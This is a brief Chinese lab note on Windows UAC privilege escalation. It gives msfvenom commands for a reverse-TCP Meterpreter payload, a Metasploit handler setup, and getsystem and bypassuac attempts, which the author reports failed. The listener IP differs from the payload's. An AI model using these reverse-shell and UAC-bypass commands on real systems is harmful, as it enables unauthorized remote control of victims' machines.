windows UAC提权
1、生成payload.exe,并下载(msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.234 LPORT=6688 -f exe -o payload.exe)
2、进入msf,设置监听
命令:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.218
set lport 6688
exploit
在虚拟机中运行payload.exe
3、提权
3.1、用getsystem命令提权(提权失败了,换3.3方法提权)
3.2、退出当前恢复(background),查看监听会话(sessions -i)
3.3、绕过UAC进行提权(本次实验没成功,如果成功的话会返回 meterpreter> 会话)
命令:
use exploit/windows/local/bypassuac
set session 1
exploit
用 getuid命令查看当前用户权限
网友评论